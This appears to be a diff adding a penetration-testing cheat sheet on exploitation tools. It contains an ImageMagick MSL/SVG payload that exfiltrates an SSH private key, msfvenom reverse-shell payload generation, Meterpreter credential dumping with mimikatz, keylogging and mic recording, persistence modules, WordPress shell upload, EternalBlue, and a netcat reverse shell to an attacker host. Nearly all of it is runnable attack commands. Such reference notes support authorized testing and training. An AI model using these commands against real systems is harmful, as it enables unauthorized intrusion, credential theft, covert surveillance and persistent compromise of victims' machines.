| 1 | + | --- |
| 2 | + | description: >- |
| 3 | + | Refernce : |
| 4 | + | https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/08_exploitation_tools.md |
| 5 | + | --- |
| 6 | + | |
| 7 | + | # Exploitation notes |
| 8 | + | |
| 9 | + | ## Exploitation Tools |
| 10 | + | |
| 11 | + | * [Resources](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/08\_exploitation\_tools.md#Resources) |
| 12 | + | |
| 13 | + | ### Table of Contents |
| 14 | + | |
| 15 | + | * [ImageTragick](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/08\_exploitation\_tools.md#ImageTragick) |
| 16 | + | * [MSL / Polyglot Attack](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/08\_exploitation\_tools.md#msl--polyglot-attack) |
| 17 | + | * [Metasploit](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/08\_exploitation\_tools.md#Metasploit) |
| 18 | + | * [searchsploit](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/08\_exploitation\_tools.md#searchsploit) |
| 19 | + | |
| 20 | + | ### Resources |
| 21 | + | |
| 22 | + | | Name | Description | URL | |
| 23 | + | | ------------ | ---------------------------------------------------------------------------------------------------------------------------------------------------------------- | ---------------------------------------------- | |
| 24 | + | | Evil-WinRM | The ultimate WinRM shell for hacking/pentesting | https://github.com/Hackplayers/evil-winrm | |
| 25 | + | | Exploitalert | Listing of latest Exploits | https://exploitalert.com | |
| 26 | + | | Metasploit | Metasploit Framework | https://github.com/rapid7/metasploit-framework | |
| 27 | + | | TheFatRat | TheFatRat is an exploiting tool which compiles a malware with famous payload, and then the compiled maware can be executed on Linux , Windows , Mac and Android. | https://github.com/Screetsec/TheFatRat | |
| 28 | + | |
| 29 | + | ### ImageTragick |
| 30 | + | |
| 31 | + | > https://imagetragick.com/ |
| 32 | + | |
| 33 | + | ### MSL / Polyglot Attack |
| 34 | + | |
| 35 | + | > https://insert-script.blogspot.com/2020/11/imagemagick-shell-injection-via-pdf.html |
| 36 | + | |
| 37 | + | #### poc.svg |
| 38 | + | |
| 39 | + | ```c |
| 40 | + | <image authenticate='ff" `echo $(cat /home/<USERNAME>/.ssh/id_rsa)> /dev/shm/id_rsa`;"'> |
| 41 | + | <read filename="pdf:/etc/passwd"/> |
| 42 | + | <get width="base-width" height="base-height" /> |
| 43 | + | <resize geometry="400x400" /> |
| 44 | + | <write filename="test.png" /> |
| 45 | + | <svg width="700" height="700" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> |
| 46 | + | <image xlink:href="msl:poc.svg" height="100" width="100"/> |
| 47 | + | </svg> |
| 48 | + | </image> |
| 49 | + | ``` |
| 50 | + | |
| 51 | + | #### Executing Payload |
| 52 | + | |
| 53 | + | ```c |
| 54 | + | $ convert poc.svg poc.png |
| 55 | + | $ cp /tmp/poc.svg /var/www/html/convert_images/ |
| 56 | + | ``` |
| 57 | + | |
| 58 | + | ### Metasploit |
| 59 | + | |
| 60 | + | > https://github.com/rapid7/metasploit-framework |
| 61 | + | |
| 62 | + | > https://github.com/rapid7/metasploit-payloads |
| 63 | + | |
| 64 | + | #### General Usage |
| 65 | + | |
| 66 | + | ```c |
| 67 | + | $ sudo msfdb run // start database |
| 68 | + | $ sudo msfdb init // database initialization |
| 69 | + | $ msfdb --use-defaults delete // delete existing databases |
| 70 | + | $ msfdb --use-defaults init // database initialization |
| 71 | + | $ msfdb status // database status |
| 72 | + | msf6 > workspace // metasploit workspaces |
| 73 | + | msf6 > workspace -a <WORKSPACE> // add a workspace |
| 74 | + | msf6 > workspace -r <WORKSPACE> // rename a workspace |
| 75 | + | msf6 > workspace -d <WORKSPACE> // delete a workspace |
| 76 | + | msf6 > workspace -D // delete all workspaces |
| 77 | + | msf6 > db_nmap <OPTIONS> // execute nmap and add output to database |
| 78 | + | msf6 > hosts // reads hosts from database |
| 79 | + | msf6 > services // reads services from database |
| 80 | + | msf6 > vulns // displaying vulnerabilities |
| 81 | + | msf6 > search // search within metasploit |
| 82 | + | msf6 > set RHOST <RHOST> // set remote host |
| 83 | + | msf6 > set RPORT <RPORT> // set remote port |
| 84 | + | msf6 > run // run exploit |
| 85 | + | msf6 > spool /PATH/TO/FILE // recording screen output |
| 86 | + | msf6 > save // saves current state |
| 87 | + | msf6 > exploit // using module exploit |
| 88 | + | msf6 > payload // using module payload |
| 89 | + | msf6 > auxiliary // using module auxiliary |
| 90 | + | msf6 > encoder // using module encoder |
| 91 | + | msf6 > nop // using module nop |
| 92 | + | msf6 > show sessions // displays all current sessions |
| 93 | + | msf6 > sessions -i 1 // switch to session 1 |
| 94 | + | msf6 > sessions -u <ID> // upgrading shell to meterpreter |
| 95 | + | msf6 > sessions -k <ID> // kill specific session |
| 96 | + | msf6 > sessions -K // kill all sessions |
| 97 | + | msf6 > jobs // showing all current jobs |
| 98 | + | msf6 > show payloads // displaying available payloads |
| 99 | + | msf6 > set VERBOSE true // enable verbose output |
| 100 | + | msf6 > set forceexploit true // exploits the target anyways |
| 101 | + | msf6 > set EXITFUNC thread // reverse shell can exit without exit the program |
| 102 | + | msf6 > set AutoLoadStdapi false // disables autoload of stdapi |
| 103 | + | msf6 > set PrependMigrate true // enables automatic process migration |
| 104 | + | msf6 > set PrependMigrateProc explorer.exe // auto migrate to explorer.exe |
| 105 | + | msf6 > use post/PATH/TO/MODULE // use post exploitation module |
| 106 | + | msf6 > use post/linux/gather/hashdump // use hashdump for Linux |
| 107 | + | msf6 > use post/multi/manage/shell_to_meterpreter // shell to meterpreter |
| 108 | + | msf6 > use exploit/windows/http/oracle_event_processing_upload // use a specific module |
| 109 | + | C:\> > Ctrl + z // put active meterpreter shell in background |
| 110 | + | meterpreter > loadstdapi // load stdapi |
| 111 | + | meterpreter > background // put meterpreter in background (same as "bg") |
| 112 | + | meterpreter > shell // get a system shell |
| 113 | + | meterpreter > channel -i <ID> // get back to existing meterpreter shell |
| 114 | + | meterpreter > ps // checking processes |
| 115 | + | meterpreter > migrate 2236 // migrate to a process |
| 116 | + | meterpreter > getuid // get the user id |
| 117 | + | meterpreter > sysinfo // get system information |
| 118 | + | meterpreter > search -f <FILE> // search for a file |
| 119 | + | meterpreter > upload // uploading local files to the target |
| 120 | + | meterpreter > ipconfig // get network configuration |
| 121 | + | meterpreter > load powershell // loads powershell |
| 122 | + | meterpreter > powershell_shell // follow-up command for load powershell |
| 123 | + | meterpreter > powershell_execute // execute command |
| 124 | + | meterpreter > powershell_import // import module |
| 125 | + | meterpreter > powershell_shell // shell |
| 126 | + | meterpreter > powershell_session_remove // remove |
| 127 | + | meterpreter > powershell_execute 'Get-NetNeighbor | Where-Object -Property State -NE "Unreachable" | Select-Object -Property IPAddress' // network discovery |
| 128 | + | meterpreter > powershell_execute '1..254 | foreach { "<XXX.XXX.XXX>.${_}: $(Test-Connection -TimeoutSeconds 1 -Count 1 -ComputerName <XXX.XXX.XXX>.${_} -Quiet)" }' // network scan |
| 129 | + | meterpreter > powershell_execute 'Test-NetConnection -ComputerName <RHOST> -Port 80 | Select-Object -Property RemotePort, TcpTestSucceeded' // port scan |
| 130 | + | meterpreter > load kiwi // load mimikatz |
| 131 | + | meterpreter > help kiwi // mimikatz help |
| 132 | + | meterpreter > kiwi_cmd // execute mimikatz native command |
| 133 | + | meterpreter > lsa_dump_sam // lsa sam dump |
| 134 | + | meterpreter > dcsync_ntlm krbtgt // dc sync |
| 135 | + | meterpreter > creds_all // dump all credentials |
| 136 | + | meterpreter > creds_msv // msv dump |
| 137 | + | meterpreter > creds_kerberos // kerberos dump |
| 138 | + | meterpreter > creds_ssp // ssp dump |
| 139 | + | meterpreter > creds_wdigest // wdigest dump |
| 140 | + | meterpreter > getprivs // get privileges after loading mimikatz |
| 141 | + | meterpreter > getsystem // gain system privileges if user is member of administrator group |
| 142 | + | meterpreter > hashdump // dumps all the user hashes |
| 143 | + | meterpreter > run post/windows/gather/checkvm // check status of the target |
| 144 | + | meterpreter > run post/multi/recon/local_exploit_suggester // checking for exploits |
| 145 | + | meterpreter > run post/windows/manage/enable_rdp // enables rdp |
| 146 | + | meterpreter > run post/multi/manage/autoroute // runs autoroutes |
| 147 | + | meterpreter > run auxiliary/server/socks4a // runs socks4 proxy server |
| 148 | + | meterpreter > keyscan_start // enabled keylogger |
| 149 | + | meterpreter > keyscan_dump // showing the output |
| 150 | + | meterpreter > screenshare // realtime screen sharing |
| 151 | + | meterpreter > screenshare -q 100 // realtime screen sharing |
| 152 | + | meterpreter > record_mic // recording mic output |
| 153 | + | meterpreter > timestomp // modify timestamps |
| 154 | + | meterpreter > execute -f calc.exe // starts a program on the victim |
| 155 | + | meterpreter > portfwd add -l <LPORT> -p <RPORT> -r 127.0.0.1 // port forwarding |
| 156 | + | ``` |
| 157 | + | |
| 158 | + | #### Metasploit through Proxychains |
| 159 | + | |
| 160 | + | ```c |
| 161 | + | $ proxychains -q msfconsole |
| 162 | + | ``` |
| 163 | + | |
| 164 | + | #### Meterpreter Listener |
| 165 | + | |
| 166 | + | **Generate Payload** |
| 167 | + | |
| 168 | + | ```c |
| 169 | + | $ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f exe -o meterpreter_payload.exe |
| 170 | + | ``` |
| 171 | + | |
| 172 | + | **Setup Listener for Microsoft Windows** |
| 173 | + | |
| 174 | + | ```c |
| 175 | + | msf6 > use exploit/multi/handler |
| 176 | + | [*] Using configured payload generic/shell_reverse_tcp |
| 177 | + | msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp |
| 178 | + | payload => windows/x64/meterpreter/reverse_tcp |
| 179 | + | msf6 exploit(multi/handler) > set LHOST <LHOST> |
| 180 | + | LHOST => <LHOST> |
| 181 | + | msf6 exploit(multi/handler) > set LPORT <LPORT> |
| 182 | + | LPORT => <LPORT> |
| 183 | + | msf6 exploit(multi/handler) > run |
| 184 | + | ``` |
| 185 | + | |
| 186 | + | **Setup Listener for MacOS** |
| 187 | + | |
| 188 | + | ```c |
| 189 | + | msf6 > use exploit/multi/handler |
| 190 | + | [*] Using configured payload generic/shell_reverse_tcp |
| 191 | + | msf6 exploit(multi/handler) > set LHOST <LHOST> |
| 192 | + | LHOST => <LHOST> |
| 193 | + | msf6 exploit(multi/handler) > set LPORT <LPORT> |
| 194 | + | LPORT => <LPORT> |
| 195 | + | msf6 exploit(multi/handler) > set PAYLOAD python/meterpreter/reverse_tcp |
| 196 | + | PAYLOAD => python/meterpreter/reverse_tcp |
| 197 | + | msf6 exploit(multi/handler) > exploit |
| 198 | + | ``` |
| 199 | + | |
| 200 | + | **Download Files** |
| 201 | + | |
| 202 | + | ```c |
| 203 | + | $ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f exe -o <FILE>.exe |
| 204 | + | ``` |
| 205 | + | |
| 206 | + | ```c |
| 207 | + | msf6 > use exploit/multi/handler |
| 208 | + | [*] Using configured payload generic/shell_reverse_tcp |
| 209 | + | msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp |
| 210 | + | payload => windows/x64/meterpreter/reverse_tcp |
| 211 | + | msf6 exploit(multi/handler) > set LHOST <LHOST> |
| 212 | + | LHOST => <LHOST> |
| 213 | + | msf6 exploit(multi/handler) > set LPORT <LPORT> |
| 214 | + | LPORT => <LPORT> |
| 215 | + | msf6 exploit(multi/handler) > run |
| 216 | + | ``` |
| 217 | + | |
| 218 | + | ```c |
| 219 | + | C:\> .\<FILE>.exe |
| 220 | + | ``` |
| 221 | + | |
| 222 | + | ```c |
| 223 | + | meterpreter > download * |
| 224 | + | ``` |
| 225 | + | |
| 226 | + | #### Enumeration |
| 227 | + | |
| 228 | + | **SNMP Scan** |
| 229 | + | |
| 230 | + | ```c |
| 231 | + | msf6 > use auxiliary/scanner/snmp/snmp_login |
| 232 | + | msf6 auxiliary(scanner/snmp/snmp_login) > set RHOSTS <RHOST> |
| 233 | + | msf6 auxiliary(scanner/snmp/snmp_login) > run |
| 234 | + | ``` |
| 235 | + | |
| 236 | + | **SNMP Enum** |
| 237 | + | |
| 238 | + | ```c |
| 239 | + | msf6 > use auxiliary/scanner/snmp/snmp_enum |
| 240 | + | msf6 auxiliary(scanner/snmp/snmp_enum) > set RHOSTS <RHOST> |
| 241 | + | msf6 auxiliary(scanner/snmp/snmp_enum) > run |
| 242 | + | ``` |
| 243 | + | |
| 244 | + | **Tomcat Enumeration** |
| 245 | + | |
| 246 | + | ```c |
| 247 | + | msf6 > use auxiliary/scanner/http/tomcat_mgr_login |
| 248 | + | msf6 auxiliary(scanner/http/tomcat_mgr_login) > set RHOSTS <RHOST> |
| 249 | + | msf6 auxiliary(scanner/http/tomcat_mgr_login) > run |
| 250 | + | ``` |
| 251 | + | |
| 252 | + | **Exploit Suggester** |
| 253 | + | |
| 254 | + | ```c |
| 255 | + | msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester |
| 256 | + | msf6 post(multi/recon/local_exploit_suggester) > set session 1 |
| 257 | + | msf6 post(multi/recon/local_exploit_suggester) > run |
| 258 | + | ``` |
| 259 | + | |
| 260 | + | #### Execute Binaries |
| 261 | + | |
| 262 | + | **Port Forwarding with Chisel** |
| 263 | + | |
| 264 | + | ```c |
| 265 | + | meterpreter > execute -Hf chisel.exe -a "client -v <LHOST>:<LPORT> R:1092:socks" |
| 266 | + | ``` |
| 267 | + | |
| 268 | + | #### Pivoting |
| 269 | + | |
| 270 | + | **Port Forwarding with Meterpreter** |
| 271 | + | |
| 272 | + | ```c |
| 273 | + | meterpreter > portfwd add -L 127.0.0.1 -l <LPORT> -p <RPORT> -r <RHOST> |
| 274 | + | meterpreter > portfwd add -L 127.0.0.1 -l <LPORT> -p <RPORT> -r <RHOST> |
| 275 | + | ``` |
| 276 | + | |
| 277 | + | **SOCKS Proxy on Meterpreter Sessions** |
| 278 | + | |
| 279 | + | ```c |
| 280 | + | meterpreter > use auxiliary/server/socks_proxy |
| 281 | + | ``` |
| 282 | + | |
| 283 | + | **Pivoting with Meterpreter** |
| 284 | + | |
| 285 | + | ```c |
| 286 | + | meterpreter > run autoroute -s <XXX.XXX.XXX>.0/24 |
| 287 | + | background |
| 288 | + | msf > use auxiliary/scanner/portscan/tcp |
| 289 | + | ``` |
| 290 | + | |
| 291 | + | #### Auxiliary Handling |
| 292 | + | |
| 293 | + | **Auxiliary Setup** |
| 294 | + | |
| 295 | + | ```c |
| 296 | + | msf6 > use auxiliary/scanner/http/tvt_nvms_traversal |
| 297 | + | msf6 auxiliary(scanner/http/tvt_nvms_traversal) > set RHOSTS <RHOST> |
| 298 | + | msf6 auxiliary(scanner/http/tvt_nvms_traversal) > set FILEPATH Users/Nathan/Desktop/Passwords.txt |
| 299 | + | msf6 auxiliary(scanner/http/tvt_nvms_traversal) > run |
| 300 | + | ``` |
| 301 | + | |
| 302 | + | **Auxiliary Output Directory** |
| 303 | + | |
| 304 | + | ```c |
| 305 | + | /home/kali/.msf4/loot/20200623090635_default_<RHOST>_nvms.traversal_680948.txt |
| 306 | + | ``` |
| 307 | + | |
| 308 | + | #### Persistence |
| 309 | + | |
| 310 | + | **Setting up Persistent Access** |
| 311 | + | |
| 312 | + | ```c |
| 313 | + | $ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f exe -o shell.exe |
| 314 | + | ``` |
| 315 | + | |
| 316 | + | **Copy exploit to target machine** |
| 317 | + | |
| 318 | + | ```c |
| 319 | + | msf6 > use exploit/windows/local/persistence |
| 320 | + | msf6 > set session 1 |
| 321 | + | msf6 > use windows/meterpreter/reverse_tcp |
| 322 | + | ``` |
| 323 | + | |
| 324 | + | **Persistence through persistence\_service** |
| 325 | + | |
| 326 | + | ```c |
| 327 | + | msf6 > use exploit/windows/local/persistence_service |
| 328 | + | msf6 > set session 2 |
| 329 | + | msf6 > set lport 5678 |
| 330 | + | msf6 > exploit |
| 331 | + | ``` |
| 332 | + | |
| 333 | + | ```c |
| 334 | + | msf6 > use exploit/multi/handler |
| 335 | + | msf6 > set payload windows/meterpreter/reverse_tcp |
| 336 | + | msf6 > set lhost <LHOST> |
| 337 | + | msf6 > set lport 5678 |
| 338 | + | msf6 > exploit |
| 339 | + | ``` |
| 340 | + | |
| 341 | + | **Persistence through Persistence\_exe** |
| 342 | + | |
| 343 | + | ```c |
| 344 | + | msf6 > use post/windows/manage/persistence_exe |
| 345 | + | msf6 > set session 1 |
| 346 | + | msf6 > set rexepath /root/payload.exe |
| 347 | + | msf6 > exploit |
| 348 | + | ``` |
| 349 | + | |
| 350 | + | ```c |
| 351 | + | msf6 > use exploit/multi/handler |
| 352 | + | msf6 > set payload windows/meterpreter/reverse_tcp |
| 353 | + | msf6 > set lhost <LHOST> |
| 354 | + | msf6 > set lport 1234 |
| 355 | + | msf6 > exploit |
| 356 | + | ``` |
| 357 | + | |
| 358 | + | **Persistence through Registry** |
| 359 | + | |
| 360 | + | ```c |
| 361 | + | msf6 > use exploit/windows/local/registry_persistence |
| 362 | + | msf6 > set session 1 |
| 363 | + | msf6 > set lport 7654 |
| 364 | + | msf6 > exploit |
| 365 | + | ``` |
| 366 | + | |
| 367 | + | ```c |
| 368 | + | msf6 > use exploit/multi/handler |
| 369 | + | msf6 > set set payload windows/meterpreter/reverse_tcp |
| 370 | + | msf6 > set lhost <LHOST> |
| 371 | + | msf6 > set lport 7654 |
| 372 | + | msf6 > exploit |
| 373 | + | ``` |
| 374 | + | |
| 375 | + | #### Exploit Handling |
| 376 | + | |
| 377 | + | **WP Shell Upload** |
| 378 | + | |
| 379 | + | ```c |
| 380 | + | msf6 > use exploit/unix/webapp/wp_admin_shell_upload |
| 381 | + | msf6 exploit(unix/webapp/wp_admin_shell_upload) > set PASSWORD P@s5w0rd! |
| 382 | + | msf6 exploit(unix/webapp/wp_admin_shell_upload) > set USERNAME admin |
| 383 | + | msf6 exploit(unix/webapp/wp_admin_shell_upload) > set TARGETURI /wordpress |
| 384 | + | msf6 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS <RHOST> |
| 385 | + | msf6 exploit(unix/webapp/wp_admin_shell_upload) > set LHOST <LHOST> |
| 386 | + | msf6 exploit(unix/webapp/wp_admin_shell_upload) > set LPORT <LPORT> |
| 387 | + | msf6 > run |
| 388 | + | ``` |
| 389 | + | |
| 390 | + | ```c |
| 391 | + | meterpreter > cd C:/inetpub/wwwroot/wordpress/wp-content/uploads |
| 392 | + | meterpreter > execute -f nc.exe -a "-e cmd.exe <LHOST> <LPORT>" |
| 393 | + | ``` |
| 394 | + | |
| 395 | + | **Dedicated Exploit** |
| 396 | + | |
| 397 | + | ```c |
| 398 | + | msf6 exploit(multi/handler) > use exploit/windows/local/ms10_015_kitrap0d |
| 399 | + | msf6 exploit(windows/local/ms10_015_kitrap0d) > set session 1 |
| 400 | + | msf6 exploit(windows/local/ms10_015_kitrap0d) > set LHOST <LHOST> |
| 401 | + | msf6 exploit(windows/local/ms10_015_kitrap0d) > set payload windows/meterpreter_reverse_tcp |
| 402 | + | msf6 exploit(windows/local/ms10_015_kitrap0d) > exploit |
| 403 | + | ``` |
| 404 | + | |
| 405 | + | **Additional Options** |
| 406 | + | |
| 407 | + | ```c |
| 408 | + | msf6 > use exploit/windows/smb/ms17_010_eternalblue |
| 409 | + | msf6 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp |
| 410 | + | msf6 exploit(windows/smb/ms17_010_eternalblue) > set LPORT <LPORT> |
| 411 | + | msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST <LHOST> |
| 412 | + | msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS <RHOST> |
| 413 | + | msf6 exploit(windows/smb/ms17_010_eternalblue) > show options |
| 414 | + | msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit -j |
| 415 | + | msf6 exploit(windows/smb/ms17_010_eternalblue) > sessions -i 1 |
| 416 | + | ``` |
| 417 | + | |
| 418 | + | ### searchsploit |
| 419 | + | |
| 420 | + | ```c |
| 421 | + | $ searchsploit <NAME> |
| 422 | + | $ searchsploit --cve <CVE> |
| 423 | + | $ searchsploit -m <ID> |
| 424 | + | $ searchsploit -x <ID> / <PATH> |
| 425 | + | ``` |
| 426 | + | |